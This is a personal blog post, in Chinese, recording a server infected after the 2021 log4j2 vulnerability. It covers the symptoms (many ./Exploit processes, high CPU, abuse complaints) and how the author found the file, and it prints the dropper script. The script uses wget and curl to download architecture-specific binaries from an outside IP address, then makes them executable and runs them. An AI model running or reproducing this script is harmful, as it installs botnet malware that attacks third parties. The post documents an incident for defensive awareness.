白小兔的小小站

既然选择了远方,便只顾风雨兼程

0%

服务器安全篇:记录病毒样本

发表于 分类于 Valine:
本文字数: 4.4k 阅读时长 ≈ 4 分钟

2021年底log4j2高危漏洞被公布,恰巧我的Java应用就中招了。我不清楚攻击者是通过什么手段将脚本放在我项目的根目录并让它执行的,这里只是记录下当时服务器的症状以及攻击脚本。

服务器症状:

  1. 查看进程发现大量的./Exploit,由以下脚本得知正是病毒本毒
  2. 服务器CPU占用高,被服务器厂商发邮件警告了
  3. 收到第三方投诉,说我的服务器攻击他们的网站了,这个邮件是通过服务器厂商转发过来的

排查过程:

  1. 查询单词exploit的含义,结合进程列表中满满的./Exploit,初步判断这是个恶意进程
  2. ./Exploit在哪,很遗憾,作为Linux菜鸟的我没找到,躺平,备份数据准备重装系统~
  3. 最后是我把备份数据放在Windows下,由Defender自动扫描发现了它,位于Java项目的根目录

下面是攻击我服务器的病毒脚本,看看就好,不要因为好奇而去保存甚至执行!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.x86; cat db0fa4b8db0333367e9bda3ab68b8042.x86 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; cat db0fa4b8db0333367e9bda3ab68b8042.mips > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mpsl; cat db0fa4b8db0333367e9bda3ab68b8042.mpsl > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm; cat db0fa4b8db0333367e9bda3ab68b8042.arm > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm5; cat db0fa4b8db0333367e9bda3ab68b8042.arm5 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm6; cat db0fa4b8db0333367e9bda3ab68b8042.arm6 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arm7; cat db0fa4b8db0333367e9bda3ab68b8042.arm7 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.ppc; cat db0fa4b8db0333367e9bda3ab68b8042.ppc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.m68k; cat db0fa4b8db0333367e9bda3ab68b8042.m68k > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.spc; cat db0fa4b8db0333367e9bda3ab68b8042.spc > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.i686; cat db0fa4b8db0333367e9bda3ab68b8042.i686 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.sh4; cat db0fa4b8db0333367e9bda3ab68b8042.sh4 > Exploit; chmod +x *; ./Exploit log4j2
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; curl -O http://46.161.52.37/596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.arc; cat db0fa4b8db0333367e9bda3ab68b8042.arc > Exploit; chmod +x *; ./Exploit log4j2
文章推荐